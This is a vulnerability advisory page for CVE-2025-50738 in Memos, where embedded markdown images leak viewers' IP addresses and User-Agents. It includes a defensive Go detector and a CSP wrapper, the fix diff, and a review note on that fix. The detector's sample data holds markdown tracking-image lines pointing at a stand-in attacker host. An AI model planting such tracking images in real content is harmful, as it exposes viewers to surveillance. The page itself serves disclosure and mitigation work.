CVE-2025-50738
Description
The Memos application, up to version v0.24.3, allows for the embedding of markdown images with arbitrary URLs. When a user views a memo containing such an image, their browser automatically fetches the image URL without explicit user consent or interaction beyond viewing the memo. This can be exploited by an attacker to disclose the viewing user's IP address, browser User-Agent string, and potentially other request-specific information to the attacker-controlled server, leading to information disclosure and user tracking.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Memos up to v0.24.3 automatically fetches arbitrary image URLs in markdown memos, exposing viewers' IP addresses and User-Agent strings to attacker-controlled servers.
Vulnerability
Overview
CVE-2025-50738 affects the Memos application, an open-source note-taking tool, in versions up to v0.24.3. The issue lies in the markdown parser component (gomark) and the frontend image rendering code. When a user views a memo containing a markdown image with an arbitrary URL, the browser automatically sends a GET request to that URL without requiring any further user interaction [1][4]. An attacker can therefore embed an image whose URL points at a server they control, and every viewer's browser will contact that server.
Exploitation
An attacker can craft a memo containing a markdown image tag pointing to an attacker-owned server. Any user who views this memo will trigger a request from their browser to that server. No additional clicks or permissions are needed. The attack is straightforward to execute and can be performed by any authenticated user of the Memos instance [1][4].
Impact
The attacker can collect the viewer's IP address and browser User-Agent string, and potentially other request-specific metadata sent with an ordinary image request (for example Referer and Accept-Language headers). This information can be used for user tracking, geolocation, or fingerprinting. While this does not directly compromise the Memos application itself, it violates user privacy and can lead to information disclosure [1][4].
Mitigation
The GitHub Security Advisory lists versions below 0.24.4 as affected and 0.24.4 as patched [1]. The commit listed under Patches below [4] changes how Memos serves stored resource binaries: files whose content type is image/svg+xml, text/html or application/xhtml+xml are returned as application/octet-stream so the browser will not execute script from them. That hardens content hosted by the instance itself; it does not by itself stop a viewer's browser from requesting an external image URL embedded in a memo. Operators who cannot upgrade, or who want defence in depth against the outbound-request leak, can restrict image loading in the memo view with a Content-Security-Policy img-src directive limited to the instance's own origin, or proxy external images through the server so that the server rather than the viewer makes the outbound request. The Memos project is actively maintained on GitHub, and the original report is tracked in issue 4707 [5].
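To make the mechanics and the mitigation concrete, the following Go program is an added example written for this page; it is not code from the Memos project or from the researcher's write-up. It scans a constructed memo for inline markdown images whose destination would make the viewer's browser contact a host other than the instance (the hostname memos.example is an assumption), and shows an http.Handler wrapper that sets the img-src policy described above. The regular expression covers CommonMark inline images only; reference-style images and the exact way gomark resolves destinations are not modelled.

```go
package main

import (
	"fmt"
	"net/http"
	"net/url"
	"regexp"
	"strings"
)

// sampleMemo is a constructed memo body (not from the Memos project) mixing
// self-hosted, relative, inline and attacker-controlled image destinations.
const sampleMemo = `Meeting notes

![logo](/o/r/123/logo.png)
![self](https://memos.example/o/r/5/x.png)
![relative](images/diagram.png)
![inline](data:image/png;base64,iVBORw0KGgo=)
![tracker](https://attacker.example/pixel.gif?u=victim)
![scheme-relative](//attacker.example/p.png)
`

// mdImage matches the CommonMark inline image form ![alt](dest "title") and
// captures the destination. Reference-style images are out of scope here.
var mdImage = regexp.MustCompile(`!\[[^\]]*\]\(\s*<?([^\s)>]+)>?(?:\s+"[^"]*")?\s*\)`)

// ExternalImageURLs returns every image destination in md that the viewer's
// browser would fetch from a host other than allowedHost (the Memos instance).
// Relative destinations and data: URIs never leave the instance, so they pass.
func ExternalImageURLs(md, allowedHost string) []string {
	var external []string
	for _, m := range mdImage.FindAllStringSubmatch(md, -1) {
		dest := m[1]
		u, err := url.Parse(dest)
		if err != nil {
			// Unparseable destinations are flagged rather than trusted.
			external = append(external, dest)
			continue
		}
		switch {
		case strings.EqualFold(u.Scheme, "data"):
			continue // inline payload, no network request is made
		case u.Host == "" && u.Scheme == "":
			continue // relative to the Memos origin
		case strings.EqualFold(u.Hostname(), allowedHost):
			continue // absolute URL pointing back at the instance
		}
		// Anything else (including scheme-relative //host/...) is a request
		// the viewer's browser would send to a third party.
		external = append(external, dest)
	}
	return external
}

// WithImageCSP wraps a handler so every response carries a policy that makes
// the browser refuse image loads from any origin but the instance itself,
// which blocks the outbound request even when such a memo is already stored.
func WithImageCSP(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		w.Header().Set("Content-Security-Policy", "img-src 'self' data:")
		next.ServeHTTP(w, r)
	})
}

func main() {
	for _, dest := range ExternalImageURLs(sampleMemo, "memos.example") {
		fmt.Println("external image, viewer IP and User-Agent would be sent to:", dest)
	}
}
```

Each flagged destination is a URL an attacker-controlled server would see the viewer request, along with the viewer's IP address and User-Agent. Restricting img-src does not remove the memo content; it only stops the browser from fetching it, so an instance that must display third-party images should proxy them through the server instead.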
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| github.com/usememos/memos (Go) | < 0.24.4 | 0.24.4 |
Affected products
- Memos application / Memos application (source: CVE description)
Patches
46d5307d7f21 fix: prevent XSS for specific content types
1 file changed · +6 −0
server/router/api/v1/resource_service.go+6 −0 modified@@ -188,6 +188,12 @@ func (s *APIV1Service) GetResourceBinary(ctx context.Context, request *v1pb.GetR if strings.HasPrefix(contentType, "text/") { contentType += "; charset=utf-8" } + // Prevent XSS attacks by serving potentially unsafe files with a content type that prevents script execution. + if strings.EqualFold(contentType, "image/svg+xml") || + strings.EqualFold(contentType, "text/html") || + strings.EqualFold(contentType, "application/xhtml+xml") { + contentType = "application/octet-stream" + } return &httpbody.HttpBody{ ContentType: contentType,
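Review bot: the new EqualFold checks run after the existing branch that appends "; charset=utf-8" to every content type starting with "text/", so a resource stored as text/html reaches the new block as "text/html; charset=utf-8" and never matches strings.EqualFold(contentType, "text/html"); only the image/svg+xml and application/xhtml+xml cases, which take no charset suffix, are actually downgraded to application/octet-stream. Either move the downgrade above the charset branch, or compare the bare media type, e.g. `mt, _, _ := mime.ParseMediaType(contentType)` followed by `switch strings.ToLower(mt) {`. An exact-match denylist of three types is also easy to slip past with other script-capable types; sending `X-Content-Type-Options: nosniff` alongside the downgrade, and treating anything outside an image allowlist as a download, would be more robust than naming individual types.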
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
[1] github.com/advisories/GHSA-hfcf-79gh-f3jc (GitHub Security Advisory)
[2] nvd.nist.gov/vuln/detail/CVE-2025-50738 (NVD entry, via GHSA)
[3] github.com/fai1424/Vulnerability-Research/tree/main/CVE-2025-50738 (researcher write-up, via GHSA)
[4] github.com/usememos/memos/commit/46d5307d7f210067b46e07400a728fa9095803d9 (fix commit, via GHSA)
[5] github.com/usememos/memos/issues/4707 (project issue, via GHSA)
News mentions
No linked articles in our index yet.